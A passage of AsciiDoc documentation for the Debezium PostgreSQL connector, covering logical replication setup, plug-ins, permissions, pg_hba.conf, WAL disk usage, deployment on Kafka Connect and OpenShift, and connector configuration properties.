accounts other than the master account to create an initial snapshot, you must grant `SELECT` permission to the accounts on the tables to be captured.\n For more information about security for PostgreSQL logical replication, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n[IMPORTANT]\n====\nEnsure that you use the latest versions of PostgreSQL 9.6, 10 or 11 on Amazon RDS.\nOtherwise, older versions of the `wal2json` plug-in might be installed.\nSee https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[the official documentation] for the exact `wal2json` versions installed on Amazon RDS.\nIn the case of an older version, replication messages received from the database might not contain complete information about type constraints such as length or scale or `NULL`\/`NOT NULL`. This might cause creation of messages with an inconsistent schema for a short period of time when there are changes to a column's definition.\n\nAs of January 2019, the following PostgreSQL versions on RDS come with an up-to-date version of `wal2json` and thus should be used:\n\n* PostgreSQL 9.6: 9.6.10 and newer\n* PostgreSQL 10: 10.5 and newer\n* PostgreSQL 11: any version\n====\n\n[[postgresql-on-azure]]\n==== PostgreSQL on Azure\n\nIt is possible to use {prodname} with\u202flink:https:\/\/docs.microsoft.com\/azure\/postgresql\/[Azure Database for PostgreSQL], which has support for the `wal2json` and\u202f`pgoutput`\u202fplug-ins, both of which are supported by {prodname} as well.\n\nSet the Azure replication support to\u202f`logical`. You can use the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-cli[Azure CLI] or the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-portal[Azure Portal] to configure this. For example, to use the Azure CLI, here are the link:https:\/\/docs.microsoft.com\/cli\/azure\/postgres\/server?view=azure-cli-latest[`az postgres server`] commands that you need to execute:\n\n```\naz postgres server configuration set --resource-group mygroup --server-name myserver --name azure.replication_support --value logical\n\naz postgres server restart --resource-group mygroup --name myserver\n```\n\n[[postgresql-on-crunchybridge]]\n==== PostgreSQL on CrunchyBridge\n\nIt is possible to use {prodname} with link:https:\/\/crunchybridge.com\/[CrunchyBridge]; logical replication is already turned on. The `pgoutput` plugin is available. You will have to create a replication user and provide correct privileges.\n\n[IMPORTANT]\n====\nWhile using the `pgoutput` plug-in, it is recommended that you configure `filtered` as the {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`]. If you use `all_tables`, which is the default value for `publication.autocreate.mode`, and the publication is not found, the connector tries to create one by using\u202f`CREATE PUBLICATION <publication_name> FOR ALL TABLES;`, but this fails due to lack of permissions.\n====\n\n[[installing-postgresql-output-plugin]]\n=== Installing the logical decoding output plug-in\n\n[TIP]\n====\nSee {link-prefix}:{link-postgresql-plugins}[Logical Decoding Output Plug-in Installation for PostgreSQL] for more detailed instructions for setting up and testing logical decoding plug-ins.\n====\n\n[NOTE]\n====\nAs of {prodname} 0.10, the connector supports PostgreSQL 10+ logical replication streaming by using `pgoutput`.\nThis means that a logical decoding output plug-in is no longer necessary and changes can be emitted directly from the replication stream by the connector.\n====\n\nAs of PostgreSQL 9.4, the only way to read changes to the write-ahead-log is to install a logical decoding output plug-in. Plug-ins are written in C, compiled, and installed on the machine that runs the PostgreSQL server. Plug-ins use a number of PostgreSQL specific APIs, as described by the link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[PostgreSQL documentation].\n\nThe PostgreSQL connector works with one of {prodname}'s supported logical decoding plug-ins to encode the changes in either link:https:\/\/github.com\/google\/protobuf[Protobuf format] or link:http:\/\/www.json.org\/[JSON] format.\nSee the documentation for your chosen plug-in to learn more about the plug-in's requirements, limitations, and how to compile it.\n\n* link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/master\/README.md[`protobuf`]\n* link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/README.md[`wal2json`]\n\nFor simplicity, {prodname} also provides a Docker image based on a vanilla PostgreSQL server image on top of which it compiles and installs the plug-ins. You can link:https:\/\/github.com\/debezium\/docker-images\/tree\/master\/postgres\/9.6[use this image] as an example of the detailed steps required for the installation.\n\n[WARNING]\n====\nThe {prodname} logical decoding plug-ins have been installed and tested on only Linux machines. For Windows and other operating systems, different installation steps might be required.\n====\n\n[[postgresql-differences-between-plugins]]\n=== Plug-in differences\n\nPlug-in behavior is not completely the same for all cases.\nThese differences have been identified:\n\n* The `wal2json` and `decoderbufs` plug-ins emit events for tables without primary keys.\n* The `wal2json` plug-in does not support special values, such as `NaN` or `infinity`, for floating point types.\n* The `wal2json` plug-in should be used with the `schema.refresh.mode` connector configuration property set to `columns_diff_exclude_unchanged_toast`. Otherwise, when receiving a change event for a row that contains an unchanged `TOAST` column, no field for that column is contained in the emitted change event's `after` field. This is because `wal2json` plug-in messages do not contain a field for such a column.\n+\nThe requirement for adding this is tracked under the link:https:\/\/github.com\/eulerto\/wal2json\/issues\/98[`wal2json` issue 98].\nSee the documentation of `columns_diff_exclude_unchanged_toast` further below for implications of using it.\n\n* The `pgoutput` plug-in does not emit all events for tables without primary keys. It emits only events for `INSERT` operations.\n\nAll up-to-date differences are tracked in a test suite link:https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-connector-postgres\/src\/test\/java\/io\/debezium\/connector\/postgresql\/DecoderDifferences.java[Java class].\n\n[[postgresql-server-configuration]]\n=== Configuring the PostgreSQL server\n\nIf you are using a {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] other than pgoutput, after installing it, configure the PostgreSQL server as follows:\n\n. To load the plug-in at startup, add the following to the `postgresql.conf` file::\n+\n[source,properties]\n----\n# MODULES\nshared_preload_libraries = 'decoderbufs,wal2json' \/\/ <1>\n----\n<1> Instructs the server to load the `decoderbufs` and `wal2json` logical decoding plug-ins at startup. The names of the plug-ins are set in the link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/v0.3.0\/Makefile[`Protobuf`] and link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/Makefile[`wal2json`] make files.\n\n. To configure the replication slot regardless of the decoder being used, specify the following in the `postgresql.conf` file:\n+\n[source,properties]\n----\n# REPLICATION\nwal_level = logical \/\/ <1>\nmax_wal_senders = 1 \/\/ <2>\nmax_replication_slots = 1 \/\/ <3>\n----\n<1> instructs the server to use logical decoding with the write-ahead log.\n<2> instructs the server to use a maximum of `1` separate process for processing WAL changes.\n<3> instructs the server to allow a maximum of `1` replication slot to be created for streaming WAL changes.\n\n{prodname} uses PostgreSQL's logical decoding, which uses replication slots.\nReplication slots are guaranteed to retain all WAL segments required for {prodname} even during {prodname} outages. For this reason, it is important to closely monitor replication slots to avoid too much disk consumption and other conditions that can happen such as catalog bloat if a replication slot stays unused for too long.\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL streaming replication documentation].\n\nIf you are working with a `synchronous_commit` setting other than `on`,\nthe recommendation is to set `wal_writer_delay` to a value such as 10 milliseconds to achieve a low latency of change events.\nOtherwise, its default value is applied, which adds a latency of about 200 milliseconds.\n\n[TIP]\n====\nReading and understanding link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[PostgreSQL documentation about the mechanics and configuration of the PostgreSQL write-ahead log] is strongly recommended.\n====\nendif::community[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-postgresql-permissions-required-by-debezium-connectors\n\/\/ Title: Setting up PostgreSQL permissions for the {prodname} connector\n[[postgresql-permissions]]\n=== Setting up permissions\n\nSetting up a PostgreSQL server to run a {prodname} connector requires a database user that can perform replications.\nReplication can be performed only by a database user that has appropriate permissions and only for a configured number of hosts.\n\nAlthough, by default, superusers have the necessary `REPLICATION` and `LOGIN` roles, as mentioned in xref:postgresql-security[Security], it is best not to provide the {prodname} replication user with elevated privileges.\nInstead, create a {prodname} user that has the the minimum required privileges.\n\n.Prerequisites\n\n* PostgreSQL administrative permissions.\n\n.Procedure\n\n. To provide a user with replication permissions, define a PostgreSQL role that has _at least_ the `REPLICATION` and `LOGIN` permissions, and then grant that role to the user.\n For example:\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<name>__ REPLICATION LOGIN;\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-privileges-to-permit-debezium-user-to-create-postgresql-publications\n\/\/ Title: Setting privileges to enable {prodname} to create PostgreSQL publications\n[[postgresql-replication-user-privileges]]\n=== Setting privileges to enable {prodname} to create PostgreSQL publications when you use `pgoutput`\n\nifdef::community[]\nIf you use `pgoutput` as the logical decoding plugin, {prodname} must operate in the database as a user with specific privileges.\nendif::community[]\n\n{prodname} streams change events for PostgreSQL source tables from _publications_ that are created for the tables.\nPublications contain a filtered set of change events that are generated from one or more tables.\nThe data in each publication is filtered based on the publication specification.\nThe specification can be created by the PostgreSQL database administrator or by the {prodname} connector.\nTo permit the {prodname} PostgreSQL connector to create publications and specify the data to replicate to them, the connector must operate with specific privileges in the database.\n\nThere are several options for determining how publications are created.\nIn general, it is best to manually create publications for the tables that you want to capture, before you set up the connector.\nHowever, you can configure your environment in a way that permits {prodname} to create publications automatically, and to specify the data that is added to them.\n\n{prodname} uses include list and exclude list properties to specify how data is inserted in the publication.\nFor more information about the options for enabling {prodname} to create publications, see {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`].\n\nFor {prodname} to create a PostgreSQL publication, it must run as a user that has the following privileges:\n\n* Replication privileges in the database to add the table to a publication.\n* `CREATE` privileges on the database to add publications.\n* `SELECT` privileges on the tables to copy the initial table data. Table owners automatically have `SELECT` permission for the table.\n\nTo add tables to a publication, the user be an owner of the table.\nBut because the source table already exists, you need a mechanism to share ownership with the original owner.\nTo enable shared ownership, you create a PostgreSQL replication group, and then add the existing table owner and the replication user to the group.\n\n.Procedure\n\n. Create a replication group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE _<replication_group>_;\n----\n. Add the original owner of the table to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT REPLICATION_GROUP TO __<original_owner>__;\n----\n. Add the {prodname} replication user to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT REPLICATION_GROUP TO __<replication_user>__;\n----\n. Transfer ownership of the table to `<replication_group>`.\n+\n[source,sql,subs=\"+quotes\"]\n----\nALTER TABLE __<table_name>__ OWNER TO REPLICATION_GROUP;\n----\n\nFor {prodname} to specify the capture configuration, the value of {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`] must be set to `filtered`.\n\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-postgresql-to-allow-replication-with-the-connector-host\n[[postgresql-host-replication-permissions]]\n=== Configuring PostgreSQL to allow replication with the {prodname} connector host\n\nTo enable {prodname] to replicate PostgreSQL data, you must configure the database to permit replication with the host that runs the PostgreSQL connector.\nTo specify the clients that are permitted to replicate with the database, add entries to the PostgreSQL host-based authentication file, `pg_hba.conf`.\nFor more information about the `pg_hba.conf` file, see link:https:\/\/www.postgresql.org\/docs\/10\/auth-pg-hba-conf.html[the PostgreSQL] documentation.\n\n.Procedure\n\n* Add entries to the `pg_hba.conf` file to specify the {prodname} connector hosts that can replicate with the database host.\nFor example,\n+\n.`pg_hba.conf` file example:\n[source]\n----\nlocal replication <youruser> trust \/\/ <1>\nhost replication <youruser> 127.0.0.1\/32 trust \/\/ <2>\nhost replication <youruser> ::1\/128 trust \/\/ <3>\n----\n<1> Instructs the server to allow replication for `<youruser>` locally, that is, on the server machine.\n<2> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV4`.\n<3> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV6`.\n\n[NOTE]\n====\nFor more information about network masks, see link:https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-net-types.html[the PostgreSQL documentation].\n====\n\nifdef::community[]\n[[supported-postgresql-topologies]]\n=== Supported PostgreSQL topologies\n\nThe PostgreSQL connector can be used with a standalone PostgreSQL server or with a cluster of PostgreSQL servers.\n\nAs mentioned {link-prefix}:{link-postgresql-connector}#postgresql-limitations[in the beginning], PostgreSQL (for all versions <= 12) supports logical replication slots on only `primary` servers. This means that a replica in a PostgreSQL cluster cannot be configured for logical replication, and consequently that the {prodname} PostgreSQL connector can connect and communicate with only the primary server. Should this server fail, the connector stops. When the cluster is repaired, if the original primary server is once again promoted to `primary`, you can restart the connector. However, if a different PostgreSQL server _with the plug-in and proper configuration_ is promoted to `primary`, you must change the connector configuration to point to the new `primary` server and then you can restart the connector.\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-postgresql-to-manage-debezium-wal-disk-space-consumption\n\/\/ Title: Configuring PostgreSQL to manage {prodname} WAL disk space consumption\n[[postgresql-wal-disk-space]]\n=== WAL disk space consumption\nIn certain cases, it is possible for PostgreSQL disk space consumed by WAL files to spike or increase out of usual proportions.\nThere are several possible reasons for this situation:\n\n* The LSN up to which the connector has received data is available in the `confirmed_flush_lsn` column of the server's `pg_replication_slots` view. Data that is older than this LSN is no longer available, and the database is responsible for reclaiming the disk space.\n+\nAlso in the `pg_replication_slots` view, the `restart_lsn` column contains the LSN of the oldest WAL that the connector might require. If the value for `confirmed_flush_lsn` is regularly increasing and the value of `restart_lsn` lags then the database needs to reclaim the space.\n+\nThe database typically reclaims disk space in batch blocks. This is expected behavior and no action by a user is necessary.\n\n* There are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. This situation can be easily solved with periodic heartbeat events. Set the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-interval-ms[`heartbeat.interval.ms`] connector configuration property.\n\n* The PostgreSQL instance contains multiple databases and one of them is a high-traffic database. {prodname} captures changes in another database that is low-traffic in comparison to the other database. {prodname} then cannot confirm the LSN as replication slots work per-database and {prodname} is not invoked. As WAL is shared by all databases, the amount used tends to grow until an event is emitted by the database for which {prodname} is capturing changes. To overcome this, it is necessary to:\n\n** Enable periodic heartbeat record generation with the `heartbeat.interval.ms` connector configuration property.\n** Regularly emit change events from the database for which {prodname} is capturing changes.\nifdef::community[]\n\n+\nIn the case of `wal2json` decoder plug-in, it is sufficient to generate empty events. This can be achieved for example by truncating an empty temporary table. For other decoder plug-ins, the recommendation is to create a supplementary table for which {prodname} is not capturing changes.\nendif::community[]\n\n+\nA separate process would then periodically update the table by either inserting a new row or repeatedly updating the same row.\nPostgreSQL then invokes {prodname}, which confirms the latest LSN and allows the database to reclaim the WAL space.\nThis task can be automated by means of the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-action-query[`heartbeat.action.query`] connector configuration property.\n\nifdef::community[]\n[TIP]\n====\nFor users on AWS RDS with PostgreSQL, a situation similar to the high traffic\/low traffic scenario can occur in an idle environment. AWS RDS causes writes to its own system tables to be invisible to clients on a frequent basis (5 minutes).\nAgain, regularly emitting events solves the problem.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-postgresql-connectors\n\/\/ Title: Deployment of {prodname} PostgreSQL connectors\n[[postgresql-deployment]]\n== Deployment\n\nifdef::community[]\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} PostgreSQL connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-postgres\/{debezium-version}\/debezium-connector-postgres-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka, PostgreSQL and Kafka Connect with the PostgreSQL connector already installed and ready to run. You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} PostgreSQL connector, add the connector files to Kafka Connect, create a custom container to run the connector, and add connector configuration to your container. Details are in the following topics:\n\n* xref:deploying-debezium-postgresql-connectors[]\n* xref:descriptions-of-debezium-postgresql-connector-configuration-properties[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-postgresql-connectors\n\/\/ Title: Deploying {prodname} PostgreSQL connectors\n[[postgresql-deploying-a-connector]]\n=== Deploying connectors\n\nTo deploy a {prodname} PostgreSQL connector, you need to build a custom Kafka Connect container image that contains the {prodname} connector archive and push this container image to a container registry.You then need to create two custom resources (CRs):\n\n* A `KafkaConnect` CR that configures your Kafka Connector and that specifies the name of the image that you created to run your {prodname} connector. You apply this CR to the OpenShift Kafka instance.\n\n* A `KafkaConnector` CR that configures your {prodname} PostgreSQL connector. You apply this CR to the OpenShift instance where Red Hat AMQ Streams is deployed.\n\n.Prerequisites\n\n* PostgreSQL is running and you performed the steps to {LinkDebeziumUserGuide}#setting-up-postgresql-to-run-a-debezium-connector[set up PostgreSQL to run a {prodname} connector].\n\n* link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] was used to set up and start running Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} PostgreSQL container for Kafka Connect:\n.. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[PostgreSQL connector archive].\n\n.. Extract the {prodname} PostgreSQL connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=\"+macros\"]\n----\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-postgresql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n.. Create a Docker file that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following, replacing `my-plugins` with the name of your plug-ins directory:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-postgresql.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nCOPY .\/_<my-plugins>_\/ \/opt\/kafka\/plugins\/ \/\/ <2>\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Replace `my-plugins` with the name of your plug-ins directory.\n+\nThe command creates a Docker file with the name `debezium-container-for-postgresql.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-postgresql.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-postgresql:latest .\n----\n+\nThe `build` command builds a container image with the name `debezium-container-for-postgresql`.\n\n.. Push your custom image to a container registry such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-postgresql:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-postgresql:latest\n----\n\n.. Create a new {prodname} PostgreSQL `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations: strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n image: debezium-container-for-postgresql \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your {prodname} connector. This property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply your `KafkaConnect` CR to the OpenShift Kafka instance by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThis updates your Kafka Connect environment in OpenShift to add a Kafka Connector instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} PostgreSQL connector instance.\n+\nYou configure a {prodname} PostgreSQL connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.\nFor the complete list of the configuration properties that you can set for the {prodname} PostgreSQL connector, see {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[PostgreSQL connector properties].\n+\nThe following example configures a {prodname} connector that connects to a PostgreSQL server host, `192.168.99.100`, on port `5432`. This host has a database named `sampledb`, a schema named `public`, and `fulfillment` is the server's logical name.\n+\n.`fulfillment-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectorApiVersion}\n kind: KafkaConnector\n metadata:\n name: fulfillment-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.postgresql.PostgresConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 5432\n database.user: debezium\n database.password: dbz\n database.dbname: sampledb\n database.server.name: fulfillment \/\/ <5>\n schema.include.list: public \/\/ <6>\n plugin.name: pgoutput \/\/ <7>\n----\n<1> The name of the connector.\n<2> Only one task should operate at any one time.\nBecause the PostgreSQL connector reads the PostgreSQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n<3> The connector\u2019s configuration.\n<4> The name of the database host that is running the PostgreSQL server. In this example, the database host name is `192.168.99.100`.\n<5> A unique server name.\nThe server name is the logical identifier for the PostgreSQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics that receive change event records.\n<6> The connector captures changes in only the `public` schema. It is possible to configure the connector to capture changes in only the tables that you choose. See {link-prefix}:{link-postgresql-connector}#postgresql-property-table-include-list[`table.include.list` connector configuration property].\n<7> The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server. While the only supported value for PostgreSQL 10 and later is `pgoutput`, you must explicitly set `plugin.name` to `pgoutput`.\n\n. Create your connector instance with Kafka Connect. For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThis registers `fulfillment-connector` and the connector starts to run against the `sampledb` database as defined in the `KafkaConnector` CR.\n\n. Verify that the connector was created and has started:\n.. Display the Kafka Connect log output to verify that the connector was created and has started to capture changes in the specified database:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/cluster=my-connect-cluster)\n----\n\n.. Review the log output to verify that {prodname} performs the initial snapshot.\nThe log displays output that is similar to the following messages:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n+\nIf the connector starts correctly without errors, it creates a topic for each table whose changes the connector is capturing.\nFor the example CR, there would be a topic for each table in the `public` schema.\nDownstream applications can subscribe to these topics.\n\n.. Verify that the connector created the topics by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc get kafkatopics\n----\n\nendif::product[]\n\nifdef::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID:debezium-postgresql-connector-configuration-example\n\/\/ Title: {prodname} PostgreSQL connector configuration example\n[[postgresql-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a PostgreSQL connector that connects to a PostgreSQL server on port 5432 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure the {prodname} PostgreSQL connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"fulfillment-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.postgresql.PostgresConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"5432\", \/\/ <4>\n \"database.user\": \"postgres\", \/\/ <5>\n \"database.password\": \"postgres\", \/\/ <6>\n \"database.dbname\" : \"postgres\", \/\/ <7>\n \"database.server.name\": \"fulfillment\", \/\/ <8>\n \"table.include.list\": \"public.inventory\" \/\/ <9>\n\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this PostgreSQL connector class.\n<3> The address of the PostgreSQL server.\n<4> The port number of the PostgreSQL server.\n<5> The name of the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<6> The password for the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<7> The name of the PostgreSQL database to connect to\n<8> The logical name of the PostgreSQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<9> A list of all tables hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the schemas and tables to include or exclude from monitoring.\n\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.\n\nThis configuration can be sent via POST to a running Kafka Connect service, which will then record the configuration and start up the one connector task that will connect to the PostgreSQL database, read the transaction log, and record events to Kafka topics.\n\n[[postgresql-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo run a {prodname} PostgreSQL connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n.Prerequisites\n\n* The {link-prefix}:{link-postgresql-connector}#postgresql-server-configuration[PostgreSQL server] is configured to support logical replication.\n\n* The {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] is installed.\n\n* The PostgreSQL connector is installed.\n\n.Procedure\n\n. Create a configuration for the PostgreSQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[performs a consistent snapshot] of the PostgreSQL server databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-configuration-properties\n\/\/ Title: Description of {prodname} PostgreSQL connector configuration properties\n[[postgresql-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} PostgreSQL connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:postgresql-required-configuration-properties[Required configuration properties]\n* xref:postgresql-advanced-configuration-properties[Advanced configuration properties]\n* xref:postgresql-pass-through-properties[Pass-through configuration properties]\n\n[id=\"postgresql-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-name]]<<postgresql-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[postgresql-property-connector-class]]<<postgresql-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.postgresql.PostgresConnector` for the PostgreSQL connector.\n\n|[[postgresql-property-tasks-max]]<<postgresql-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The PostgreSQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[postgresql-property-plugin-name]]<<postgresql-property-plugin-name, `+plugin.name+`>>\n|`decoderbufs`\n|The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server.\n\nifdef::community[]\nSupported values are `decoderbufs`, `wal2json`, `+wal2json_rds+`, `+wal2json_streaming+`, `+wal2json_rds_streaming+` and `pgoutput`.\n\nIf you are using a `wal2json` plug-in and transactions are very large, the JSON batch event that contains all transaction changes might not fit into the hard-coded memory buffer, which has a size of 1 GB. In such cases, switch to a streaming plug-in, by setting the `plugin-name` property to `wal2json_streaming` or `wal2json_rds_streaming`. With a streaming plug-in, PostgreSQL sends the connector a separate message for each change in a transaction.\n\nendif::community[]\nifdef::product[]\nThe only supported value is `pgoutput`. You must explicitly set `plugin.name` to `pgoutput`.\nendif::product[]\n\n|[[postgresql-property-slot-name]]<<postgresql-property-slot-name, `+slot.name+`>>\n|`debezium`\n|The name of the PostgreSQL logical decoding slot that was created for streaming changes from a particular plug-in for a particular database\/schema. The server uses this slot to stream events to the {prodname} connector that you are configuring.\n\nSlot names must conform to link:https:\/\/www.postgresql.org\/docs\/current\/static\/warm-standby.html#STREAMING-REPLICATION-SLOTS-MANIPULATION[PostgreSQL replication slot naming rules], which state: _\"Each replication slot has a name, which can contain lower-case letters, numbers, and the underscore character.\"_\n\n|[[postgresql-property-slot-drop-on-stop]]<<postgresql-property-slot-drop-on-stop, `+slot.drop.on.stop+`>>\n|`false`\n|Whether or not to delete the logical replication slot when the connector stops in a graceful, expected way. The default behavior is that the replication slot remains 